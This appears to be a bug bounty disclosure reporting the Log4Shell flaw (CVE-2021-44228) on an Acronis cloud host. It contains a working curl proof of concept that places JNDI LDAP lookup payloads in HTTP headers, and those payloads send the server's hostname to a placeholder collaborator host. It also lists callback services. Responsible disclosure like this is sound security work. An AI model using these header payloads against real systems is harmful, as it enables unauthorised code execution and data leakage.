[CVE-2021-44228] Arbitrary Code Execution on ng01-cloud.acronis.com

### Description The application is using a vulnerable version of Log4j which allows arbitrary remote command execution. The vulnerability is also known as Log4Shell and is assigned [CVE-2021-44228](https://www.randori.com/blog/cve-2021-44228/). ### Reproduction Steps For easier reproduction, please use Burp Collaborator and issue the following curl command with your collaborator instance URL; ```bash curl --http1.1 --silent --output /dev/null \ --header 'User-agent: ${jndi:ldap://${hostName}.<COLLABORATOR_URL>/a}' \ --header 'X-Forwarded-For: ${jndi:ldap://${hostName}.<COLLABORATOR_URL>/a}' \ --header 'Referer: ${jndi:ldap://${hostName}.<COLLABORATOR_URL>/a}' \ https://ng01-cloud.acronis.com ``` You should receive a request to your Collaborator Client with your server's hostname as the prefix. That should suffice to prove that the host is vulnerable. The hostname I received was `ng01-cloud-elk-ls-vm01`. Note that it may take some time to receive the pingbacks. In case Burp Collaborator doesn't work, I'd advise using your own. Some alternatives are; 1. dig.pm 2. app.interactsh.com 3. dnslog.cn 4. pingb.in 5. requestbin.net 6. canarytokens.com ### Reference https://www.lunasec.io/docs/blog/log4j-zero-day/ ## Impact Arbitrary remote code execution